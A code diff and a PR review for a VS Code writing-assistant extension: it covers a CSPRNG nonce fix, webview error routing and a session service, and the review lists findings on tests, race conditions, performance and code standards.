+    // `payload.details` carrying the componentStack) flow to the handler
+    // like every other message, so UIHandler logs the text AND the Details
+    // line exactly as it does for the sidebar (PR #67 review #10). Text
+    // parsing stays in the shared coercer in both paths — never a fork.
     const messageSubscription = panel.webview.onDidReceiveMessage((message: unknown) => {
-      const text = coerceWebviewErrorText(message);
-      if (text !== undefined) {
-        this.outputChannel.appendLine(`[WEBVIEW ERROR] (workshop) ${text}`);
+      const shape = message as { type?: unknown; payload?: unknown } | null;
+      const isBareBootError =
+        shape?.type === MessageType.WEBVIEW_ERROR && shape.payload === undefined;
+      if (isBareBootError) {
+        const text = coerceWebviewErrorText(message);
+        if (text !== undefined) {
+          this.outputChannel.appendLine(`[WEBVIEW ERROR] (workshop) ${text}`);
+        }
         return;
       }
       void this.messageHandler?.handleMessage(message as Parameters<MessageHandler['handleMessage']>[0]);

--- a/apps/vscode-extension/src/application/providers/webviewHtml.ts
+++ b/apps/vscode-extension/src/application/providers/webviewHtml.ts
@@ -12,6 +12,7 @@
  * cannot drift between surfaces.
  */
 
+import { randomBytes } from 'crypto';
 import * as vscode from 'vscode';
 // Surface contract + message type via the public barrel (ADR 2026-06-16):
 // the same symbols the webview entry point reads, so the stamp can't drift.
@@ -94,11 +95,12 @@ export function getWebviewHtml(
 </html>`;
 }
 
+/**
+ * CSP nonce from the CSPRNG (PR #66 review #15): `Math.random()` is
+ * predictable, and this string is the only thing standing between the CSP and
+ * an injected <script> once real model output renders in these documents.
+ * base64 stays within the token charset CSP nonces allow.
+ */
 function getNonce(): string {
-  let text = '';
-  const possible = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789';
-  for (let i = 0; i < 32; i++) {
-    text += possible.charAt(Math.floor(Math.random() * possible.length));
-  }
-  return text;
+  return randomBytes(24).toString('base64');
 }

--- a/apps/vscode-extension/src/extension.ts
+++ b/apps/vscode-extension/src/extension.ts
@@ -34,6 +34,7 @@ import {
   TextSourceResolver,
   AccountBalanceService,
   OpenRouterAccountClient,
+  WorkshopSessionService,
   CoreServices,
 } from '@prose-minion/core';
 // VS Code adapters (app-local; the composition root wires them into the ports)
@@ -137,6 +138,15 @@ export function activate(context: vscode.ExtensionContext): void {
     new OpenRouterAccountClient(secretsService, outputChannel),
     outputChannel
   );
+  // The balance service is shared by BOTH webview surfaces, so its lifecycle
+  // belongs here, not to any single MessageHandler's dispose (which would
+  // strip the surviving surface's refresh listeners).
+  context.subscriptions.push({ dispose: () => accountBalanceService.dispose() });
+
+  // Workshop session aggregate (ADR 2026-07-03): one instance, owned by the
+  // composition root, so the thread survives panel close/reopen and webview
+  // reloads — reload-safety lives HERE, not in React state.
+  const workshopSessionService = new WorkshopSessionService();
 
   const coreServices: CoreServices = {
     assistantToolService,
@@ -151,7 +161,8 @@ export function activate(context: vscode.ExtensionContext): void {
     secretsService,
     textSourceResolver,
     categorySearchService,
-    accountBalanceService
+    accountBalanceService,
+    workshopSessionService
   };
 
   // Migrate API key from settings to SecretStorage if needed

--- a/docs/pr-reviews/pr-67-session-spine-review.md
+++ b/docs/pr-reviews/pr-67-session-spine-review.md
@@ -12,22 +12,22 @@ act before merge · **Deferred** = real issue, safe to punt for a stated reason 
 
 | # | Sev | Finding | Reviewers | Consensus | Status |
 |---|-----|---------|-----------|-----------|--------|
-| 1 | 🟠 High | `useWorkshop` is the only domain hook with zero tests — and it holds the webview half of reload-safety | Cal, Bria | 🎯 | **Open** |
-| 2 | 🟠 High | The multicast fix is never tested with two live handlers receiving concurrent delivery | Cal | — | **Open** |
-| 3 | 🟠 High | `handleSetExcerpt` has no active-run guard — mid-run re-pin silently misattributes the finished turn | Sam | — | **Open** |
-| 4 | 🟠 High | Preempted/reset/zombie runs leave no request- or tool-correlated log trail | Oliver | — | **Open** |
-| 5 | 🟡 Standard | Listener-set/unsubscribe/try-catch primitive hand-written 4× (5th prior-art copy already existed) | Marcus, Parker | 🎯 | **Open** |
-| 6 | 🟡 Standard | `WorkshopApp.tsx` monolith: extract turn bubble + excerpt panel; add memo boundary around the thread | Parker, Tim | 🎯 | **Open** |
-| 7 | 🟡 Standard | Streaming tests assert per-type counts, never cross-message order the webview handshake depends on | Cal | — | **Open** |
-| 8 | 🟡 Standard | Live-run identity tracked three ways at once in `useWorkshop` | Parker | — | **Deferred** — correct today; collapse to one ref when touching the hook (pairs with #16) |
-| 9 | 🟡 Standard | Zero-payload messages use `interface {}` against the 9-for-9 `Record<string, never>` house idiom | Stan | — | **Open** |
-| 10 | 🟡 Standard | ErrorBoundary `componentStack` silently dropped on the Workshop surface (sidebar keeps it) | Stan | — | **Open** |
-| 11 | 🟡 Standard | `countWords` re-splits the full excerpt on every streamed token | Tim | — | **Open** |
+| 1 | 🟠 High | `useWorkshop` is the only domain hook with zero tests — and it holds the webview half of reload-safety | Cal, Bria | 🎯 | **Addressed** — `useWorkshop.test.ts` (11 tests): mount request, snapshot rehydration incl. mid-run adoption, dedupe, stream lifecycle, settled handshake, source filters. 11-for-11 convention restored |
+| 2 | 🟠 High | The multicast fix is never tested with two live handlers receiving concurrent delivery | Cal | — | **Addressed** — MessageHandler fakes now hold a REAL listener Set; new test: usage fans to both surfaces, disposing one leaves the survivor receiving. `ListenerSet` has its own 6-test suite; idle gating capture-and-invoked in both handler suites |
+| 3 | 🟠 High | `handleSetExcerpt` has no active-run guard — mid-run re-pin silently misattributes the finished turn | Sam | — | **Addressed** — host-side guard rejects mid-run re-pin with a workshop error (closes the round-trip race the UI disable can't); test covers reject + post-run re-pin |
+| 4 | 🟠 High | Preempted/reset/zombie runs leave no request- or tool-correlated log trail | Oliver | — | **Addressed** — requestId+tool-correlated lines for preempt, cancel (the branch aborted runs actually resolve through), zombie-refused completion, and dispose-abort; asserted in tests |
+| 5 | 🟡 Standard | Listener-set/unsubscribe/try-catch primitive hand-written 4× (5th prior-art copy already existed) | Marcus, Parker | 🎯 | **Addressed** — `utils/ListenerSet.ts` is the one address; all five sites (AIRM, AssistantTool, Dictionary, CategorySearch, AccountBalance) consume it |
+| 6 | 🟡 Standard | `WorkshopApp.tsx` monolith: extract turn bubble + excerpt panel; add memo boundary around the thread | Parker, Tim | 🎯 | **Addressed** — `components/workshop/`: memoized `WorkshopTurnBubble` + `WorkshopThread` (turn history skips token-clock renders) + `ExcerptPanel` |
+| 7 | 🟡 Standard | Streaming tests assert per-type counts, never cross-message order the webview handshake depends on | Cal | — | **Addressed** — happy-path test pins the exact 10-message sequence (COMPLETE strictly before the assistant TURN) |
+| 8 | 🟡 Standard | Live-run identity tracked three ways at once in `useWorkshop` | Parker | — | **Deferred** — correct today (now under test); collapse to one ref when Sprint 3 touches the hook |
+| 9 | 🟡 Standard | Zero-payload messages use `interface {}` against the 9-for-9 `Record<string, never>` house idiom | Stan | — | **Addressed** — both messages extend `MessageEnvelope<Record<string, never>>` directly, 11-for-11 |
+| 10 | 🟡 Standard | ErrorBoundary `componentStack` silently dropped on the Workshop surface (sidebar keeps it) | Stan | — | **Addressed** — enveloped WEBVIEW_ERRORs route to UIHandler (text + Details, sidebar parity); only bare pre-React boot errors keep the panel-side `(workshop)`-tagged line |
+| 11 | 🟡 Standard | `countWords` re-splits the full excerpt on every streamed token | Tim | — | **Addressed** — memoized on excerpt text |
 | 12 | 🟡 Standard | Full-history snapshot re-cloned and re-broadcast on every mutation, uncapped | Tim | — | **Deferred** — non-issue at today's scale; cap/diff before Sprint 3 makes long threads normal |
-| 13 | 🟡 Standard | Untrusted model markdown → `dangerouslySetInnerHTML`, no sanitizer; `img-src https:` allows beacon exfil | Patricia | — | **Deferred** — inherited surface (sidebar identical); sanitize once in shared `MarkdownRenderer` as follow-up |
-| 14 | 🟡 Standard | Architecture witness regex never extended to `WorkshopSessionService` — "news nothing" unenforced | Bria | — | **Open** |
-| 15 | 🟡 Standard | Preempted run's `finally` fires ungated `sendStatus('')`, blanking the new run's ticker | Sam | — | **Open** |
-| 16 | 🟢 Nit | Bubble-retire effect deps on unstable `streaming` object — live bubble retires early (brief flicker) | Blake | — | **Open** |
+| 13 | 🟡 Standard | Untrusted model markdown → `dangerouslySetInnerHTML`, no sanitizer; `img-src https:` allows beacon exfil | Patricia | — | **Deferred** — inherited surface (sidebar identical); now tracked in epic Known Risks: sanitize once in shared `MarkdownRenderer` before the epic merges to main |
+| 14 | 🟡 Standard | Architecture witness regex never extended to `WorkshopSessionService` — "news nothing" unenforced | Bria | — | **Addressed** — `WorkshopSessionService` joins the forbidden-construction net in boundaries.test.ts |
+| 15 | 🟡 Standard | Preempted run's `finally` fires ungated `sendStatus('')`, blanking the new run's ticker | Sam | — | **Addressed** — status clear gated on no successor owning the slot; overlapping-run test asserts the survivor's ticker |
+| 16 | 🟢 Nit | Bubble-retire effect deps on unstable `streaming` object — live bubble retires early (brief flicker) | Blake | — | **Addressed** — deps are now `[turns, resetStreaming]` (stable callback); the settled-window survival is pinned by test |
 | 17 | 🟢 Praise | `CancellableStreamingDomain` — deferred scope enforced by the compiler, not a comment | Marcus | — | **N/A** — praise |
 | 18 | 🟢 Praise | WorkshopHandler lifecycle is a zero-drift mirror of AnalysisHandler's new pattern | Stan | — | **N/A** — praise |
 | 19 | 🟢 Praise | CSPRNG nonce carry-over (#15, PR 66) completely and correctly done, both surfaces | Patricia | — | **N/A** — praise |

--- a/docs/pr-reviews/pr-67-session-spine-review.md
+++ b/docs/pr-reviews/pr-67-session-spine-review.md
@@ -1,0 +1,312 @@
+# PR Review — feat(workshop): Sprint 02 — Session Spine (single streaming turn, host-side session)
+
+**Author:** okeylanders · PR #67 · `claude/sprint-02-session-spine-skndyo` → `epic/workshop-editor-tab`
+
+## Resolution ledger
+
+Status is the reviewer's **initial recommendation**, not a verdict — update the `Status`
+column as findings are addressed so this file stays a living record. Legend: **Open** =
+act before merge · **Deferred** = real issue, safe to punt for a stated reason (track it)
+· **Addressed** = fixed · **Partially addressed** = fixed with a noted remainder · **N/A**
+= out of scope, superseded, or praise (nothing to resolve).
+
+| # | Sev | Finding | Reviewers | Consensus | Status |
+|---|-----|---------|-----------|-----------|--------|
+| 1 | 🟠 High | `useWorkshop` is the only domain hook with zero tests — and it holds the webview half of reload-safety | Cal, Bria | 🎯 | **Open** |
+| 2 | 🟠 High | The multicast fix is never tested with two live handlers receiving concurrent delivery | Cal | — | **Open** |
+| 3 | 🟠 High | `handleSetExcerpt` has no active-run guard — mid-run re-pin silently misattributes the finished turn | Sam | — | **Open** |
+| 4 | 🟠 High | Preempted/reset/zombie runs leave no request- or tool-correlated log trail | Oliver | — | **Open** |
+| 5 | 🟡 Standard | Listener-set/unsubscribe/try-catch primitive hand-written 4× (5th prior-art copy already existed) | Marcus, Parker | 🎯 | **Open** |
+| 6 | 🟡 Standard | `WorkshopApp.tsx` monolith: extract turn bubble + excerpt panel; add memo boundary around the thread | Parker, Tim | 🎯 | **Open** |
+| 7 | 🟡 Standard | Streaming tests assert per-type counts, never cross-message order the webview handshake depends on | Cal | — | **Open** |
+| 8 | 🟡 Standard | Live-run identity tracked three ways at once in `useWorkshop` | Parker | — | **Deferred** — correct today; collapse to one ref when touching the hook (pairs with #16) |
+| 9 | 🟡 Standard | Zero-payload messages use `interface {}` against the 9-for-9 `Record<string, never>` house idiom | Stan | — | **Open** |
+| 10 | 🟡 Standard | ErrorBoundary `componentStack` silently dropped on the Workshop surface (sidebar keeps it) | Stan | — | **Open** |
+| 11 | 🟡 Standard | `countWords` re-splits the full excerpt on every streamed token | Tim | — | **Open** |
+| 12 | 🟡 Standard | Full-history snapshot re-cloned and re-broadcast on every mutation, uncapped | Tim | — | **Deferred** — non-issue at today's scale; cap/diff before Sprint 3 makes long threads normal |
+| 13 | 🟡 Standard | Untrusted model markdown → `dangerouslySetInnerHTML`, no sanitizer; `img-src https:` allows beacon exfil | Patricia | — | **Deferred** — inherited surface (sidebar identical); sanitize once in shared `MarkdownRenderer` as follow-up |
+| 14 | 🟡 Standard | Architecture witness regex never extended to `WorkshopSessionService` — "news nothing" unenforced | Bria | — | **Open** |
+| 15 | 🟡 Standard | Preempted run's `finally` fires ungated `sendStatus('')`, blanking the new run's ticker | Sam | — | **Open** |
+| 16 | 🟢 Nit | Bubble-retire effect deps on unstable `streaming` object — live bubble retires early (brief flicker) | Blake | — | **Open** |
+| 17 | 🟢 Praise | `CancellableStreamingDomain` — deferred scope enforced by the compiler, not a comment | Marcus | — | **N/A** — praise |
+| 18 | 🟢 Praise | WorkshopHandler lifecycle is a zero-drift mirror of AnalysisHandler's new pattern | Stan | — | **N/A** — praise |
+| 19 | 🟢 Praise | CSPRNG nonce carry-over (#15, PR 66) completely and correctly done, both surfaces | Patricia | — | **N/A** — praise |
+| 20 | 🟢 Praise | Fan-out isolates and logs throwing listeners — one webview's bug can't blind the other | Oliver | — | **N/A** — praise |
+
+---
+
+## Blast Radius
+
+- 34 files changed · +2694 / −272 · 6 commits
+- New files: 7 (2 of them test suites) · Migrations: n/a (VS Code extension) · New services: 2 — `WorkshopSessionService` (host-side session aggregate) + `WorkshopHandler` (the 12th domain handler)
+- The webview goes live this sprint: real streamed model output renders in the Workshop panel for the first time, and two webviews now share one `CoreServices`.
+- Note: at 3,868 diff lines this PR exceeds the review harness's ~800-line focus threshold — all ten reviewers read the full diff, with per-lane focus pointers.
+
+---
+
+## Report Card
+
+| Category | Grade |
+| --- | --- |
+| 🏛️ Architecture | B |
+| 🛡️ Security | B |
+| 🧪 Tests | C+ |
+| 📖 Quality | B− |
+| ⚡ Performance | B− |
+| 🎯 Domain | C+ |
+
+---
+
+## Executive Briefing
+
+Zero blockers — Blake traced preemption, reset-mid-run, zombie completion, dispose ordering, and reload contracts against real source and the requestId guards hold at both layers. The high-severity findings all live at the seams of *verification*, not in the runtime spine:
+
+🟠 **[Cal · Bria]** 🎯 `useWorkshop` untested — the only hook in `hooks/domain/` without a test (10 of 10 siblings have one), and it carries the webview half of the sprint's headline reload-safety criterion; the sprint doc's precise test tally stops exactly at the host boundary.
+
+🟠 **[Cal]** The load-bearing multicast fix is never exercised at its own seam — no test puts two live handlers on one Set and asserts both receive delivery, and the mocks structurally can't distinguish handler A's registration from B's, so "dispose blinds the survivor" has no regression net.
+
+🟠 **[Sam]** Mid-run excerpt re-pin misattribution — `handleSetExcerpt` has no active-run guard, the disable on the rail's edit button only lands after a message round-trip, and `WorkshopTurn` carries no excerpt provenance, so a finished turn can silently describe text that's no longer pinned.
+
+🟠 **[Oliver]** Designed disappearances leave no trail — preempted, reset, and zombie-refused runs produce zero request- or tool-correlated log lines; the only trace is an anonymous orchestrator "Streaming cancelled (N chars)" line, exactly now that two surfaces stream concurrently through one manager.
+
+---
+
+## 🏛️ Marcus · Architecture & Design
+
+"The Cartographer of Layer Boundaries"
+
+### 🟡 Standard — Listener-multicast pattern hand-written four times instead of once [🎯 Consensus]
+
+`packages/core/src/infrastructure/api/orchestration/AIResourceManager.ts:51` — The steal/blind fix itself is the right call — composition-root-owned singletons, per-webview listeners, unsubscribe-on-dispose. But the mechanism that makes it work is written out independently four times in this diff, not extracted once: `AIResourceManager` (`tokenUsageListeners` / `tokenUsageFanout` / `addTokenUsageListener`), `AssistantToolService`, `DictionaryService`, and `CategorySearchService` (each with `statusListeners` / `addStatusListener` / emit loop). Each is structurally identical: a `Set<Listener>`, an `addXListener` returning an unsubscribe closure, and a dispatch loop that isolates per-listener failures with a try/catch and an `outputChannel` log line. Searched the repo for an existing shared primitive (`Emitter`, `Multicast`, `Listeners`, `Signal`, `Notifier`…) — not found; this PR had a clean opportunity to introduce one and instead wrote the same ~15 lines four times. That's duplication of *knowledge* (the dispatch contract), not just text — the next service that needs to survive two webviews gets a fifth copy to keep in sync rather than a constructor argument.
+
+### 🟢 Praise — Deferred scope enforced at compile time, not by comment
+
+`packages/core/src/shared/streamingCancelMessages.ts:22` — `CancellableStreamingDomain = Exclude<StreamingDomain, 'workshop'>` is a new abstraction that earns its keep. Rather than a `// TODO: workshop cancel not wired yet`, the `Record<CancellableStreamingDomain, …>` signature makes `createCancelRequestMessage('workshop', …)` a compile error until the composer sprint adds workshop back into the union. One line, precisely scoped to the actual gap, trivially deletable when Sprint 3 lands the cancel wire. Institutional memory lives in the type checker instead of a comment someone will stop reading in a month.
+
+> *"The layer boundaries are sound and the composition root finally behaves like one — I'd just ask why the same listener seam got tailored four separate times instead of cut once and shared."* — Marcus
+
+---
+
+## 🔥 Blake · Staff Engineer
+
+"She's Been Paged for This Before"
+
+**No blocking findings.** Blake traced every escalation path against real source, not mocks: preempt / reset-mid-run / zombie completion (requestId-keyed guards at both the handler and the aggregate; a stale run can never clear the live one, and the aggregate refuses every zombie turn), the preempted stream corrupting the new run's webview state (id-keyed chunk/complete gating in `useWorkshop`, robust regardless of arrival order), the multicast wiring (snapshot iteration, own-registration-only release on dispose, fan-out survives `refreshConfiguration`), reload contracts, genuine AbortSignal threading, and the null/exception surface. Nothing clears her bar.
+
+### 🟢 Nit — Live bubble retires a few ticks early (flicker) — recorded by the orchestrator; Blake judged it below her blocking bar
+
+`packages/core/src/presentation/webview/hooks/domain/useWorkshop.ts:239` — The bubble-retire effect keys on `[turns, streaming]`, and `useStreaming` returns a fresh object every render, so the effect fires on `endStreaming()` and retires the live bubble a few message-ticks early — a brief flicker (streamed text → spinner → final turn) that the `settled` flag was built to prevent. Final state is correct; no corruption, exception, or broken contract. Fix shape: depend on a stable primitive (e.g. `streaming.isStreaming` or a `reset` callback ref) instead of the hook's return object.
+
+> *"I came looking for the 3am page — but the requestId guards hold under both preempt and reset, dispose releases only its own subscriptions, and the aggregate refuses every zombie completion; there's nothing in here that's going to wake me."* — Blake
+
+---
+
+## 🔍 Sam · Bug Hunter
+
+"What if the list is empty, though?"
+
+### 🟠 High — Excerpt re-pin mid-run leaves the completed turn attributed to a silently-replaced excerpt
+
+`packages/core/src/application/handlers/domain/WorkshopHandler.ts:193` — `handleRunTool` snapshots the excerpt once (line 108) and passes that closure-captured copy across the `await` — the *correct* choice for the run itself. The problem is the other side: `handleSetExcerpt` calls `this.session.setExcerpt(...)` unconditionally — no check of `this.activeRun` anywhere in it (searched diff for an in-flight guard inside `handleSetExcerpt` — not found). And it's reachable through normal fast clicking, not just crafted messages: `WorkshopApp.tsx` disables "Replace excerpt…" via `disabled={workshop.isRunning}`, and `isRunning` only flips true after the round-trip `STREAM_STARTED`/`SESSION_STATE` reply lands — a real client-side window right after clicking a tool. When the run completes, the assistant turn (correctly) reflects the OLD excerpt's analysis, but `WorkshopTurn` carries no excerpt id/hash/snapshot — the thread has zero way to indicate "this turn is about text that's no longer pinned." The user just sees an analysis that mysteriously doesn't match the rail. Neither new test suite calls `setExcerpt` while a run is active.
+
+### 🟡 Standard — A preempted run's own `finally` unconditionally blanks status, racing the new run's "Streaming…" text
+
+`packages/core/src/application/handlers/domain/WorkshopHandler.ts:181` — In `handleRunTool`'s `finally`, the `activeRun` clear IS gated (`if (this.activeRun?.requestId === requestId)`) but the `sendStatus('')` right after it is not. `preemptActiveRun` aborts synchronously and the new run's `sendStatus('Streaming NewTool…')` goes out with no `await` in between — so when the old run's suspended promise settles, its `finally` blanks the new run's status for the rest of the stream's visible duration. `StatusPayload` carries no requestId and `handleStatusMessage` filters only by source, so the webview can't tell a stale blank from a live one. The same ungated shape pre-exists in `AnalysisHandler` (downgraded per the cross-cutting rule) — but Workshop's single-slot design makes preemption the *primary, documented* interaction, not incidental overlap. None of the 12 WorkshopHandler tests exercise overlapping runs or assert STATUS ordering across a preemption. *(Independently traced and confirmed by the orchestrator before the panel reported.)*
+
+> *"Found the trap door: swap the excerpt mid-run and the finished turn just keeps quiet about it — no hash, no snapshot, no 'this was about the old text,' the thread will swear up and down it's talking about whatever's pinned now."* — Sam
+
+---
+
+## 📖 Parker · Code Quality
+
+"Code is Communication, Not Instruction"
+
+### 🟡 Standard — The same listener-set/unsubscribe primitive is hand-rolled five times instead of extracted once [🎯 Consensus]
+
+`packages/core/src/infrastructure/api/services/analysis/AssistantToolService.ts:76` — This PR writes the same ~10-line shape four separate times (AssistantToolService, DictionaryService, CategorySearchService, AIResourceManager — identical shape, different noun). And `AccountBalanceService.addRefreshListener` already had this exact pattern *before* this PR — working prior art sitting right there to extract instead of retyping it four more times. A single `ListenerSet<T>` (add → unsubscribe; emit → try/catch fan-out with a caller-supplied log prefix) replaces all five copies, and the next question ("should a throwing listener count toward some limit? should the log line be structured?") gets answered once instead of five times in five slightly-drifting ways.
+
+### 🟡 Standard — Live-run identity is tracked three ways at once in useWorkshop — correct, but a lot to hold in your head
+
+`packages/core/src/presentation/webview/hooks/domain/useWorkshop.ts:97` — "Is a run live" is tracked via `currentRequestId` (state, drives `isRunning`), `currentRequestIdRef` (a ref shadow), and `liveRunRef` (`{requestId, settled}`, drives the streaming bubble). They move in lockstep except in the "stream finished, turn hasn't arrived" window, where clearing is split between a dedicated effect and `handleSessionState`'s no-run branch — whichever fires first. I traced all four handlers plus the effect and believe it's correct — but that's the point: a tired reader shouldn't have to hand-simulate message order to trust it. Collapsing to one ref — `{requestId, phase: 'streaming' | 'settled'} | null`, with `currentRequestId` derived — turns three moving parts into one.
+
+### 🟡 Standard — WorkshopApp.tsx is hiding two ready-made components inside its ~390-line body [🎯 Consensus]
+
+`packages/core/src/presentation/webview/WorkshopApp.tsx:217` — `renderTurn` takes only `turn` (plus module-level `TOOL_ICONS`) and branches into two unrelated JSX shapes — it's a `<WorkshopTurnBubble turn={turn}/>` in everything but name, recreated every render, sitting oddly next to the file's own convention of extracting shared visuals into `./components/shared/`. The "Working Excerpt" block (state, `pinDraft`/`beginEditingExcerpt`, ~55 lines of JSX) depends on exactly three props and would halve the rail as `<ExcerptPanel>`. Worth doing now — Sprint 3's composer and Sprint 4's tools modal are both about to land in this same file.
+
+> *"It all works, but I had to walk three ref names through four message handlers to trust the streaming bubble wouldn't double-fire — and that's before finding the two components hiding inside this one 500-line file."* — Parker
+
+---
+
+## 🧪 Cal · Test Coverage & Quality
+
+"Confidence Levels, Not Coverage Numbers"
+
+### 🟠 High — The multicast fix's actual behavior — two live handlers, one Set, concurrent delivery — is never exercised
+
+`packages/core/src/__tests__/application/handlers/MessageHandler.test.ts:79` — The suite has exactly one place where two MessageHandlers coexist, and it only checks that the shared *session snapshot* reaches both — a plain shared object, unrelated to the listener refactor. It never fires a token-usage or status event and asserts both surfaces receive it: the literal behavior this PR calls "THE LOAD-BEARING FIX." The dispose test is purely sequential (create → dispose → create), so it can't catch "disposing A blinds still-open B" — the exact bug in the PR description. The fakes make this structurally impossible to catch even by accident: `categoryAddStatusListener` returns the same dispose fn regardless of which handler registered, and `capturedTokenUsageCallback` is a single variable overwritten on each registration. The real Set-based fan-out has zero direct unit tests — searched diff and repo: no `AIResourceManager.test.ts` or `AssistantToolService.test.ts` exists at all. Also unverified: the per-handler idle gating (`WorkshopHandler.ts:67`, `AnalysisHandler.ts:50`) — both suites mock `addStatusListener` as `jest.fn(() => jest.fn())` and never capture-and-invoke the listener to prove status is suppressed while idle.
+
+### 🟡 Standard — WorkshopHandler streaming test never pins cross-message order, only per-type counts
+
+`packages/core/src/__tests__/application/handlers/domain/WorkshopHandler.test.ts:141` — The file's only order-capable helper, `postedTypes()`, is used exactly once — in a single-message test with nothing to order. The multi-message run test asserts STREAM_STARTED/CHUNK/COMPLETE/WORKSHOP_TURN only via independently filtered arrays — never the sequence WorkshopHandler actually produces (user TURN → SESSION_STATE → STARTED → chunks → COMPLETE → assistant TURN → SESSION_STATE). That order is load-bearing on the webview side: `useWorkshop` keeps the live bubble alive until the assistant turn lands. A refactor that moved `postTurn(assistantTurn)` ahead of `sendStreamComplete()` would silently break that handshake — and this suite stays green throughout.
+
+### 🟡 Standard — useWorkshop.ts is the one domain hook in this codebase with no test — not a convention, a gap [🎯 Consensus]
+
+Searched the diff and `__tests__/presentation/webview/hooks/domain/` — no `useWorkshop.test.ts`, no `WorkshopApp` test anywhere. Applying the sibling baseline honestly: `WorkshopApp.tsx` untested is NOT a deviation (`App.tsx` has zero tests too — house convention; dropped per Rule B). `useWorkshop.ts` is the opposite case: every other file in `hooks/domain/` ships a dedicated test. It's the sole exception, and it isn't trivial — 295 lines carrying the client-side half of this sprint's reload-safety claim: snapshot adoption of a mid-run `activeRequestId`, the `liveRunRef`/"settled" handshake, the StrictMode-safe ref mirror. None of that reconciliation logic has a single assertion.
+
+> *"Twenty-two new tests and not one of them puts two handlers in the room at the same time to watch the multicast actually multicast — I've seen this movie, and the blinded-survivor scene always gets cut from the trailer."* — Cal
+
+---
+
+## 🗂️ Stan · Codebase Standards
+
+"He Has Every Pattern Memorized"
+
+### 🟡 Standard — Workshop's zero-payload messages use `{}` instead of the house `Record<string, never>` idiom
+
+`packages/core/src/shared/types/messages/workshop.ts:99` — Every other zero-payload message in the codebase — nine of them, across sources.ts, ui.ts, publishing.ts, configuration.ts, warnings.ts — extends `MessageEnvelope<Record<string, never>>` directly, with no named payload interface at all. That's 9-for-9 on the established idiom. `WorkshopResetSessionPayload {}` and `WorkshopRequestSessionPayload {}` (line 105) are the only two places in the whole message layer using an empty interface body instead — and `{}` in TypeScript is structurally satisfied by almost any non-nullish value, so unlike its nine siblings this "no payload" contract doesn't actually block a stray field from being smuggled through. Nothing in the lint config catches the drift automatically.
+
+### 🟡 Standard — ErrorBoundary's componentStack detail is silently dropped for the Workshop surface, kept for the sidebar
+
+`apps/vscode-extension/src/application/providers/WorkshopPanelProvider.ts:94` — `WorkshopApp`'s new `handleBoundaryError` posts the exact same envelope as `App.tsx`'s. On the sidebar, the provider forwards every message to the router, so `UIHandler.handleWebviewError` logs the coerced text AND a second `Details:` line carrying `payload.details` (the componentStack). `WorkshopPanelProvider` intercepts with `coerceWebviewErrorText` at the transport layer *before* the router sees the message, logs only the capped text, and `return`s — so the same `UIHandler` sitting in the panel's own MessageHandler never gets the chance. `UIHandler.handleWebviewError` is the only place `details` is ever logged, and it's the one place this surface can't reach. A live crash's stack trace is diagnostically weaker on Workshop than on the sidebar it's supposed to mirror. (Downgraded per the cross-cutting rule: the shared coercer isn't missing, it's consumed at a different layer on this one surface.)
+
+### 🟢 Praise — WorkshopHandler's status-gating + dispose is a faithful, near-verbatim mirror of AnalysisHandler's new lifecycle pattern
+
+`packages/core/src/application/handlers/domain/WorkshopHandler.ts:65` — The multicast fix landing identically at both call sites that needed it: `AnalysisHandler` gates guide-loading status on `activeRequests.size > 0` with a comment that's almost word-for-word what `WorkshopHandler` says, gated on `activeRun` instead — same rationale, same `addStatusListener` → unsubscribe-on-dispose shape, same `dispose()` structure. Two implementations of a brand-new pattern usually drift a little; this one didn't. Good sibling-matching.
+
+> *"We had nine `Record<string, never>` payloads and a UIHandler that's been logging componentStacks for who knows how long — the pattern was sitting right next door on both counts, and workshop still found two ways to not quite knock."* — Stan
+
+---
+
+## ⚡ Tim · Performance
+
+"O(n²) at Scale is an Incident Waiting to Happen"
+
+### 🟡 Standard — Excerpt word count re-split on every render, including every streamed token
+
+`packages/core/src/presentation/webview/WorkshopApp.tsx:258` — `countWords` (`text.trim().split(/\s+/).length`) is called inline in header JSX with no `useMemo` (searched diff for `useMemo`/`React.memo` — not found anywhere in this PR). The excerpt doesn't change during a run, but `WorkshopApp` re-renders on every `STREAM_CHUNK`, so a full split over the entire pinned excerpt runs once per streamed token. Sub-millisecond at a few hundred words — genuinely a non-issue today — but it's O(excerpt) work repeated for zero benefit on every tick of the token clock; pin a chapter and you pay 10× per chunk. One-line `useMemo` fix, zero behavior risk, worth taking now.
+
+### 🟡 Standard — No render isolation between the live stream and the accumulated turn thread [🎯 Consensus]
+
+`packages/core/src/presentation/webview/WorkshopApp.tsx:431` — Header, rail, palette, `workshop.turns.map(renderTurn)`, and the live `StreamingContent` bubble all live in one component with no `React.memo` anywhere in the tree. Every token event re-runs `useWorkshop()` and re-renders all of it — a fresh `.map(renderTurn)` over full turn history per chunk, not just at the 100ms display debounce. `MarkdownRenderer`'s own content-keyed `useMemo` spares the `marked()` re-parse, so it's O(turns) of component/prop-diff work at token rate, not O(turns × parse). Comfortably cheap at today's shape (single panel, threads reset well under 100 turns) — flagged as the first thing to reach for when Sprint 3's continuation lets threads grow, since turn count is exactly the axis this multiplies against on every token. Fix shape: hoist the turn list into a memoized child keyed on `turns`, so only the live bubble subscribes to per-chunk state.
+
+### 🟡 Standard — Full-history snapshot, uncapped, re-cloned and re-broadcast on every session mutation
+
+`packages/core/src/application/services/WorkshopSessionService.ts:143` — `getSnapshot()` deep-clones the *entire* `turns` array every call, and `postSessionState()` ships the full snapshot — not a diff — after every pin, run start, completion/error, and reset, plus per mount and per visibility flush. `turns` only shrinks via explicit `reset()` — searched diff for a cap (`MAX_TURNS`, `slice`, trim) — not found, and no sibling convention exists to have deviated from. At realistic scale this is microseconds and a few hundred KB. The concern is purely the shape: O(total accumulated turns) work and payload, paid in full on every mutation, no ceiling — and it lands on *click*, not spread across a stream. Worth a turn cap or incremental-snapshot design before Sprint 3 makes marathon threads the norm.
+
+> *"Three places doing perfectly reasonable O(n) work and none of them noticed they'd been wired to the token clock — cheap at n<100, and cheap is not the same as free."* — Tim
+
+---
+
+## 🛡️ Patricia · Security
+
+"She Reads Code Like an Attacker Would"
+
+### 🟡 Standard — Untrusted OpenRouter markdown renders as live HTML in Workshop's thread — inherited surface, now doubled
+
